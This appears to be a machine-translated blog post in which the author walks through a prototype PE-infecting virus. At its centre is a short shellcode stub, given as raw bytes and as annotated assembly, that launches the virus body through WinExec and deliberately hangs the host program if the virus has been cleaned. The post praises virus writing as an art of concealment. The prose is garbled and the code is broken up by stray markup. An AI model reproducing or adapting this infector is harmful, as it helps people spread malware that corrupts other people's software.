About infectious viruses (1)

In my opinion, infectious viruses are really known as viruses, because it is difficult to manually clear infectious viruses. In college, the most annoying thing to help people eliminate viruses is to run into infected viruses, unless you write a program for automatic processing, manual cleanup is quite troublesome. of course, my so-called real virus mainly seems to me that the viruses that can be easily cleared by hand are not good viruses. virus makers are pursuing a fast propagation speed, while ignoring the virus's "stubborn". A Trojan simply uses a startup registry key, which is obviously too convenient to clean up, you can even delete the registry key in security mode, and even the virus bodies can be ignored.

With the deep research on PE format and the development of advanced languages, writing infectious viruses is no longer only available in ASM. advanced languages such as VC can also be completed, but the disadvantage is that the compiled virus is too large. the current hardware level, people no longer care about the 10 + kb space. however, virus writing is an art. This art is concealed. The short injection of 100 bytes is a reflection of this art by taking advantage of the gaps in the program itself without increasing the length of the program. of course, the limit on code length will inevitably reduce the number of injection code functions. A week ago, I wrote a prototype of infectious virus. writing it down is a review.

Injection infection:

Since there is no space available for the pe program itself. in this way, the startup code of the virus file is injected when the PE file is infected, which saves most of the space. When the virus entity is cleared, the demonstration can be performed by damaging the host program running process"

 

Unsigned char injectcode [] = {<br/> 0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64, <br/> 0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44, <br/> 0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11, <br/> 0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0, <br/> 0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22, <br/> 0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b, <br/> 0x44, 0x24, 0x0a, 0x8f, 0x80, 0xb8, 0x00, 0x00, <br/> 0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe <br/> }; <br/> /*********************************** * *********** <br/> injectcode [] = <br/>__ ASM <br/>{< br/> push 11223344 h; install seh <br/> XOR eax, eax <br/> push dword ptr fs: [eax] <br/> mov dword ptr fs: [eax], ESP <br/> push eax; ucmdshow <br/> push 11223344 h; lpcmdline <br/> mov eax, 11223344 h; offset awinexec <br/> call eax; call winexec <br/> CMP Al, 2; Determine whether the virus exists <br/> je label; if not, skip the endless loop <br/> XOR eax, eax; uninstall seh <br/> pop dword ptr fs: [eax] <br/> pop edX <br/> push 11223344 h; Host Program original OEP <br/> retn; <br/> push 11223344 h; seh exception handling program <br/> mov eax, dword ptr [esp + 10] <br/> pop dword ptr [eax + 0b8h]; returns the host OEP as a secure address <br/> XOR eax, eax <br/> retn <br/> label: <br/> JMP label; JMP-1 (oxebfe) <br/>}< br/> ******************************* *****************/

 

 

The injection code is the machine code corresponding to the Assembly Code in the following _ ASM.

The running process of this part of the injection code is: Install Seh-> winexec ()-> judge whether the run is successful-> If the run is unsuccessful, it enters the endless loop. If the run is successful, the execution of the host is returned.

Seh is installed mainly to ensure the robustness of the program after injection and infection, because the winexec () address is hard-coded. if the system is changed, it is easy to cause exceptions, if an exception occurs after seh is installed, the host code can be returned for execution. 11223344h is the placeholder address, which must be changed to the corresponding address. here, winexec is used instead of CreateProcess. The latter has too many function parameters. The essence of using winexec is to call CreateProcess, but there are only two parameters, saving more than 10 bytes of space. because we have installed Seh, we are not afraid of winexec exceptions.

With the above injection code, collect necessary address information and complete the injection code before infection.

 

This article from the csdn blog, reproduced please indicate the source: http://blog.csdn.net/GaA_Ra/archive/2010/06/27/5697579.aspx